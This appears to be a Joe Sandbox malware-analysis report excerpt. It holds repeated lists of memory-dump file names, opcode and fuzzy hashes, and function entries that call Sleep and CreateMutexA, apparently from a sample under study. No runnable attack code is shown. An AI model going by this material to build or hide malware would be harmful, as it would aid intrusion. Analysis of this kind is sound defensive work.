Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: ab9adcdd97a96d412e858c9d6a6c1b8288a392926744dc5e69ed0ae48b36d78f
Instruction ID: 48863c4d5b16064be45afb579451f098bc4353776ac3f01edd9fa877b32732f2
Opcode Fuzzy Hash: ab9adcdd97a96d412e858c9d6a6c1b8288a392926744dc5e69ed0ae48b36d78f
Instruction Fuzzy Hash: 76318A31A147049BFB1ABB7CDCC976CB762AFC6310F20469AE5149B3D5C73659808712

Function 0038A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: 01a8d439651e8febb312715d6e208fe5d17e1becae3120dc4d356f6ade87f0ca
Instruction ID: 46df310a5849435778955c6461892411c38bdb52967af8eccea74175937e210b
Opcode Fuzzy Hash: 01a8d439651e8febb312715d6e208fe5d17e1becae3120dc4d356f6ade87f0ca
Instruction Fuzzy Hash: 3131A831A006049BFF1ABBB8CCC9BACB762EFC1314F20468AE1149B3D6C77559808752

Function 0038A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: f60f5de2be2572c53f9cdc6f5902cf162200e8b9ad30d01c0320b1e72497667f
Instruction ID: 59281371709a1025e45d7239f60b4d6c25110ec638432cf05dcda74819b8bab8
Opcode Fuzzy Hash: f60f5de2be2572c53f9cdc6f5902cf162200e8b9ad30d01c0320b1e72497667f
Instruction Fuzzy Hash: A2318A31A046049BFB1AFB78DCC976CB762EFC2318F24869AE4549B3D5C73999808712

Function 0038A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: 92e8145eaf7cf1f646b7e276ef68e3649a8b747928d7471c4eb9cd03d22bc013
Instruction ID: f8d5b67c0461fdcaf3a2d48ccbd052fffcc2ec8e8c405c7f9f08f4c0227d5993
Opcode Fuzzy Hash: 92e8145eaf7cf1f646b7e276ef68e3649a8b747928d7471c4eb9cd03d22bc013
Instruction Fuzzy Hash: AB31A631A047048BFB1AFBB8CC89B6CF762EFC1314F24869AE014AB2D5C73599808752

Function 00389ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: ff239b6a83992d0fd521f42f8daa76c19aeb049c40071265203bfbec28234752
Instruction ID: 0a566533d816c60b4e81ba23deeec46c7f487e89e096d440df4289f9a82e1bca
Opcode Fuzzy Hash: ff239b6a83992d0fd521f42f8daa76c19aeb049c40071265203bfbec28234752
Instruction Fuzzy Hash: 312197316043049BFF2ABB6CECC972CF762EBC1300F24469AE5088B2E5C77569808712

Function 0038A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2>
API String ID: 1464230837-3102021284
Opcode ID: 3f4212dccf45683f97bc347c0a5866575a9fdeb52b5e0b46989c802523f1f85c
Instruction ID: eceeb8e5087782d7f3ab270f14082aab4f847d284c3dfeebba3a306a2ec3e10f
Opcode Fuzzy Hash: 3f4212dccf45683f97bc347c0a5866575a9fdeb52b5e0b46989c802523f1f85c
Instruction Fuzzy Hash: 622148312487009AFF2777AC989A72DBA529FC1300F340997E6449B2D1DB7A998083A3

Function 0038A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0038A963
CreateMutexA.KERNEL32(00000000,00000000,003E3254), ref: 0038A981

Strings

T2>, xrefs: 0038A970

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
